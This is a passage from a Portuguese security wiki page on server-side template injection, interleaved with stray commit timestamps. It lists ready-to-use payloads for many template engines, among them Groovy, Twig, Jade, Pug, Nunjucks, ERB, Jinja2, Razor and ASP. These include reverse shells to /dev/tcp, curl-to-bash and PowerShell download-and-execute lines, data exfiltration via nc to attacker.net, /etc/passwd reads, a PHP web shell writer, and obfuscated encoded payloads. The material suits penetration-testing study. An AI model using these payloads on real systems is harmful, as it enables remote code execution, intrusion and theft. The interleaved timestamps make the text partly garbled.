@groovy .transform.ASTTest(value={
2023-06-25 23:26:46 +00:00
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
2022-09-26 09:52:47 +00:00
})
def x
//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
```
2024-04-06 19:38:49 +00:00
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
2024-01-15 10:37:10 +00:00
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa** . Com **a missão de promover o conhecimento técnico** , este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2024-01-01 19:42:29 +00:00
##
2022-10-25 15:56:49 +00:00
2024-01-01 19:42:29 +00:00
### Smarty (PHP)
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```php
{$smarty.version}
{php}echo `id` ;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?> ",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
* Na seção Smarty de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
### Twig (PHP)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{7*'7'}} = 49`
2024-02-05 02:45:11 +00:00
* `{{1/0}} = Error`
* `{{foobar}} Nothing`
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
#Get Info
{{_self}} #(Ref. to current application)
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
2022-10-03 13:43:01 +00:00
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
2021-06-25 12:34:30 +00:00
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
2024-01-10 22:21:02 +00:00
{{['id',""]|sort('system')}}
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
2021-06-25 12:34:30 +00:00
```
2024-04-06 19:38:49 +00:00
2024-02-05 02:45:11 +00:00
**Twig - Formato de Template**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```php
$output = $twig > render (
2023-06-25 23:26:46 +00:00
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
2021-06-25 12:34:30 +00:00
);
$output = $twig > render (
2023-06-25 23:26:46 +00:00
"Dear {first_name}",
array("first_name" => $user.first_name)
2021-06-25 12:34:30 +00:00
);
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
* Na seção Twig e Twig (Sandboxed) em [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
### Plates (PHP)
2023-03-28 17:50:22 +00:00
2024-03-26 07:58:54 +00:00
Plates é um mecanismo de modelagem nativo do PHP, inspirado no Twig. No entanto, ao contrário do Twig, que introduz uma nova sintaxe, o Plates utiliza código PHP nativo nos modelos, tornando-o intuitivo para os desenvolvedores PHP.
2023-08-29 18:57:50 +00:00
2024-02-06 14:25:15 +00:00
Controlador:
2024-04-06 19:38:49 +00:00
2023-03-28 17:50:22 +00:00
```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');
// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
Modelo de página:
2024-04-06 19:38:49 +00:00
2023-06-25 23:26:46 +00:00
```php
<?php $this->layout('template', ['title' => 'User Profile']) ?>
2023-06-06 18:56:34 +00:00
2023-06-25 23:26:46 +00:00
< h1 > User Profile< / h1 >
< p > Hello, <?=$this->e($name)?> < / p >
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
Modelo de layout:
2024-04-06 19:38:49 +00:00
2023-03-28 17:50:22 +00:00
```html
< html >
2023-06-25 23:26:46 +00:00
< head >
< title > <?=$this->e($title)?> < / title >
< / head >
< body >
<?=$this->section('content')?>
< / body >
2023-03-28 17:50:22 +00:00
< / html >
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
**Mais informações**
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates )
2024-01-01 19:42:29 +00:00
### PHPlib e HTML\_Template\_PHPLIB (PHP)
2023-03-28 17:50:22 +00:00
2023-06-06 18:56:34 +00:00
[HTML\_Template\_PHPLIB ](https://github.com/pear/HTML\_Template\_PHPLIB ) é o mesmo que PHPlib, mas portado para Pear.
2023-03-28 17:50:22 +00:00
`authors.tpl`
2024-04-06 19:38:49 +00:00
2023-03-28 17:50:22 +00:00
```html
< html >
2023-06-25 23:26:46 +00:00
< head > < title > {PAGE_TITLE}< / title > < / head >
< body >
< table >
< caption > Authors< / caption >
< thead >
< tr > < th > Name< / th > < th > Email< / th > < / tr >
< / thead >
< tfoot >
< tr > < td colspan = "2" > {NUM_AUTHORS}< / td > < / tr >
< / tfoot >
< tbody >
2023-03-28 17:50:22 +00:00
<!-- BEGIN authorline -->
2023-06-25 23:26:46 +00:00
< tr > < td > {AUTHOR_NAME}< / td > < td > {AUTHOR_EMAIL}< / td > < / tr >
2023-03-28 17:50:22 +00:00
<!-- END authorline -->
2023-06-25 23:26:46 +00:00
< / tbody >
< / table >
< / body >
2023-03-28 17:50:22 +00:00
< / html >
```
2024-04-06 19:38:49 +00:00
2024-03-29 20:56:56 +00:00
`autores.php`
2024-04-06 19:38:49 +00:00
2023-03-28 17:50:22 +00:00
```php
< ?php
//we want to display this author list
$authors = array(
2023-06-25 23:26:46 +00:00
'Christian Weiske' => 'cweiske@php.net',
'Bjoern Schotte' => 'schotte@mayflower.de'
2023-03-28 17:50:22 +00:00
);
require_once 'HTML/Template/PHPLIB.php';
//create template object
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');
//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
//display the authors
foreach ($authors as $name => $email) {
2023-06-25 23:26:46 +00:00
$t->setVar('AUTHOR_NAME', $name);
$t->setVar('AUTHOR_EMAIL', $email);
$t->parse('authorline_ref', 'authorline', true);
2023-03-28 17:50:22 +00:00
}
//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
**Mais informações**
2024-02-23 16:42:31 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib )
2024-02-05 02:45:11 +00:00
2024-01-01 19:42:29 +00:00
### Jade (NodeJS)
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```javascript
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```
```javascript
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-06-25 12:34:30 +00:00
2023-06-06 18:56:34 +00:00
* Na seção Jade de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
### patTemplate (PHP)
2023-08-29 18:57:50 +00:00
2024-02-05 02:45:11 +00:00
> [patTemplate](https://github.com/wernerwa/pat-template) é um mecanismo de modelagem PHP não compilado que usa tags XML para dividir um documento em diferentes partes.
2024-04-06 19:38:49 +00:00
2023-03-28 17:50:22 +00:00
```xml
< patTemplate:tmpl name = "page" >
2023-06-25 23:26:46 +00:00
This is the main page.
< patTemplate:tmpl name = "foo" >
It contains another template.
< / patTemplate:tmpl >
< patTemplate:tmpl name = "hello" >
Hello {NAME}.< br / >
< / patTemplate:tmpl >
2023-03-28 17:50:22 +00:00
< / patTemplate:tmpl >
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
**Mais informações**
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate )
2024-01-01 19:42:29 +00:00
### Handlebars (NodeJS)
2023-08-29 18:57:50 +00:00
2024-02-05 02:45:11 +00:00
Travessia de Caminho (mais informações [aqui ](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/ )).
2024-04-06 19:38:49 +00:00
2021-02-03 09:46:19 +00:00
```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
* \= Erro
2020-07-15 15:43:14 +00:00
* ${7\*7} = ${7\*7}
2023-06-06 18:56:34 +00:00
* Nada
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
{{#with "s" as |string|}}
2023-06-25 23:26:46 +00:00
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
2020-07-15 15:43:14 +00:00
{{/with}}
URLencoded:
2023-07-11 13:30:20 +00:00
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-07-15 15:43:14 +00:00
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html ](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html )
2024-01-01 19:42:29 +00:00
### JsRender (NodeJS)
2020-12-01 16:50:24 +00:00
2024-04-06 19:38:49 +00:00
| **Modelo** | **Descrição** |
| ---------- | --------------------------------------------- |
| | Avaliar e renderizar saída |
| | Avaliar e renderizar saída codificada em HTML |
| | Comentário |
| e | Permitir código (desativado por padrão) |
2020-12-01 16:50:24 +00:00
2021-10-18 11:21:18 +00:00
* \= 49
2020-12-01 16:50:24 +00:00
2023-07-11 13:30:20 +00:00
**Lado do Cliente**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
2020-12-01 16:50:24 +00:00
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Lado do Servidor**
2024-04-06 19:38:49 +00:00
2020-12-01 16:50:24 +00:00
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-12-01 16:50:24 +00:00
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/ ](https://appcheck-ng.com/template-injection-jsrender-jsviews/ )
2024-01-01 19:42:29 +00:00
### PugJs (NodeJS)
2021-01-09 10:15:51 +00:00
2021-01-10 15:09:49 +00:00
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
2021-12-16 22:42:47 +00:00
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
2021-01-10 15:09:49 +00:00
2024-02-05 02:45:11 +00:00
**Exemplo de renderização no lado do servidor**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```javascript
2021-01-10 15:09:49 +00:00
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-01-09 10:15:51 +00:00
2024-01-01 19:42:29 +00:00
* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/ ](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/ )
2021-01-09 10:15:51 +00:00
2024-01-01 19:42:29 +00:00
### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>
2022-02-01 22:03:45 +00:00
2022-02-09 16:22:44 +00:00
* \{{7\*7\}} = 49
2023-06-06 18:56:34 +00:00
* \{{foo\}} = Sem saída
2024-02-05 02:45:11 +00:00
* \#{7\*7} = #{7\*7}
2023-06-06 18:56:34 +00:00
* \{{console.log(1)\}} = Erro
2024-04-06 19:38:49 +00:00
2022-02-01 22:03:45 +00:00
```javascript
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>& 1\"')")()}}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2022-02-01 22:03:45 +00:00
* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine ](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine )
2024-01-01 19:42:29 +00:00
### ERB (Ruby)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
* `<%= 7*7 %> = 49`
2024-03-16 10:05:23 +00:00
* `<%= foobar %> = Erro`
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
< %= system("whoami") %> #Execute code
< %= Dir.entries('/') %> #List folder
< %= File.open('/etc/passwd').read %> #Read file
< %= system('cat /etc/passwd') %>
< %= `ls /` %>
< %= IO.popen('ls /').readlines() %>
< % require 'open3' %>< % @a ,@b,@c,@d=Open3.popen3('whoami') %>< %= @b .readline()%>
< % require 'open4' %>< % @a ,@b,@c,@d=Open4.popen4('whoami') %>< %= @c .readline()%>
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby )
2021-06-25 12:34:30 +00:00
2024-01-01 19:42:29 +00:00
### Slim (Ruby)
2021-06-25 12:34:30 +00:00
* `{ 7 * 7 }`
2024-04-06 19:38:49 +00:00
2021-10-18 11:21:18 +00:00
```
2021-06-25 12:34:30 +00:00
{ %x|env| }
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
### Python
2021-06-25 16:27:28 +00:00
2024-03-29 20:56:56 +00:00
Confira a seguinte página para aprender truques sobre **execução de comandos arbitrários, burlando as caixas de areia** em python:
2021-06-25 16:27:28 +00:00
2022-05-16 08:29:00 +00:00
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes ](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-25 16:27:28 +00:00
2024-01-01 19:42:29 +00:00
### Tornado (Python)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
2024-02-05 02:45:11 +00:00
* `{{foobar}} = Error`
2020-07-15 15:43:14 +00:00
* `{{7*'7'}} = 7777777`
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2020-07-15 15:43:14 +00:00
{% import foobar %} = Error
2022-02-09 16:22:44 +00:00
{% import os %}
2022-09-26 09:52:47 +00:00
2022-10-03 13:43:01 +00:00
{% import os %}
2022-12-09 14:47:58 +00:00
{% endraw %}
2023-01-13 17:40:30 +00:00
2023-03-05 22:20:47 +00:00
2023-04-05 23:11:20 +00:00
2024-02-23 16:42:31 +00:00
2024-03-29 20:56:56 +00:00
2024-04-06 19:38:49 +00:00
2022-12-09 14:47:58 +00:00
{{os.system('whoami')}}
2022-04-06 08:57:29 +00:00
{{os.system('whoami')}}
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
* [https://ajinabraham.com/blog/server-side-template-injection-in-tornado ](https://ajinabraham.com/blog/server-side-template-injection-in-tornado )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
### Jinja2 (Python)
2021-06-25 12:34:30 +00:00
2024-01-01 19:42:29 +00:00
[Site oficial ](http://jinja.pocoo.org )
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
> Jinja2 é um mecanismo de modelo completo para Python. Possui suporte total a Unicode, um ambiente de execução integrado com sandbox opcional, amplamente utilizado e licenciado sob a BSD.
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
* `{{7*7}} = Erro`
2020-07-15 15:43:14 +00:00
* `${7*7} = ${7*7}`
2023-06-06 18:56:34 +00:00
* `{{foobar}} Nada`
2021-06-25 12:34:30 +00:00
* `{{4*4}}[[5*5]]`
* `{{7*'7'}} = 7777777`
* `{{config}}`
* `{{config.items()}}`
* `{{settings.SECRET_KEY}}`
* `{{settings}}`
2022-04-06 08:57:29 +00:00
* `<div data-gb-custom-block data-tag="debug"></div>`
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2020-07-15 15:43:14 +00:00
{% debug %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2022-06-18 20:54:28 +00:00
2023-04-05 23:11:20 +00:00
2023-04-30 21:23:47 +00:00
2024-02-23 16:42:31 +00:00
2024-03-29 20:56:56 +00:00
2024-04-06 19:38:49 +00:00
2020-07-15 15:43:14 +00:00
{{settings.SECRET_KEY}}
2021-06-25 12:34:30 +00:00
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
2024-04-06 19:38:49 +00:00
2024-03-26 07:58:54 +00:00
**Jinja2 - Formato de Template**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2021-06-25 12:34:30 +00:00
{% extends "layout.html" %}
{% block body %}
2023-06-25 23:26:46 +00:00
< ul >
{% for user in users %}
< li > < a href = "{{ user.url }}" > {{ user.username }}< / a > < / li >
{% endfor %}
< / ul >
2021-06-25 12:34:30 +00:00
{% endblock %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2023-04-05 23:11:20 +00:00
2023-03-28 17:50:22 +00:00
```
2024-04-06 19:38:49 +00:00
2024-02-05 02:45:11 +00:00
[**RCE não dependente de** ](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/ ) `__builtins__` :
2024-04-06 19:38:49 +00:00
2023-03-28 17:50:22 +00:00
```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
# Or in the shotest versions:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
2021-06-25 12:34:30 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais detalhes sobre como abusar do Jinja**:
2021-06-25 12:34:30 +00:00
2022-07-20 01:03:41 +00:00
{% content-ref url="jinja2-ssti.md" %}
[jinja2-ssti.md ](jinja2-ssti.md )
{% endcontent-ref %}
2021-06-07 09:30:58 +00:00
2024-02-06 14:25:15 +00:00
Outros payloads em [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 )
2024-01-01 19:42:29 +00:00
### Mako (Python)
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
2021-06-07 09:30:58 +00:00
< %
import os
x=os.popen('id').read()
%>
${x}
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
**Mais informações**
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako )
2024-01-01 19:42:29 +00:00
### Razor (.Net)
2020-07-19 21:53:59 +00:00
2023-06-06 18:56:34 +00:00
* `@(2+2) <= Sucesso`
* `@() <= Sucesso`
2024-02-05 02:45:11 +00:00
* `@("{{código}}") <= Sucesso`
* `@ <= Sucesso`
2023-06-06 18:56:34 +00:00
* `@{} <= ERRO!`
* `@{ <= ERRO!`
2020-07-19 21:53:59 +00:00
* `@(1+2)`
2024-03-29 20:56:56 +00:00
* `@( //CódigoC# )`
2022-01-06 11:03:56 +00:00
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
2024-03-29 20:56:56 +00:00
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4MQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBXAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
2020-07-19 21:53:59 +00:00
2024-02-06 14:25:15 +00:00
O método .NET `System.Diagnostics.Process.Start` pode ser usado para iniciar qualquer processo no servidor e assim criar um webshell. Você pode encontrar um exemplo de aplicativo da web vulnerável em [https://github.com/cnotin/RazorVulnerableApp ](https://github.com/cnotin/RazorVulnerableApp )
2020-07-19 21:53:59 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-07-19 21:53:59 +00:00
2021-10-18 11:21:18 +00:00
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/ ](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\ )-in-ASP.NET-Razor/)
2024-02-23 16:42:31 +00:00
* [https://www.schtech.co.uk/razor-pages-ssti-rce/ ](https://www.schtech.co.uk/razor-pages-ssti-rce/ )
2024-03-29 20:56:56 +00:00
### ASP
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
* `<%= foo %>` = Nada
* `<%= response.write(date()) %>` = \<Data>
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
```xml
2022-02-03 15:39:58 +00:00
< %= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais Informações**
2022-02-03 15:39:58 +00:00
2024-02-05 02:45:11 +00:00
* [https://www.w3schools.com/asp/asp\_examples.asp ](https://www.w3schools.com/asp/asp\_examples.asp )
2022-02-03 15:39:58 +00:00
2024-01-01 19:42:29 +00:00
### Mojolicious (Perl)
2020-07-26 18:06:17 +00:00
2024-02-05 02:45:11 +00:00
Mesmo sendo perl, ele usa tags como ERB em Ruby.
2020-07-26 18:06:17 +00:00
* `<%= 7*7 %> = 49`
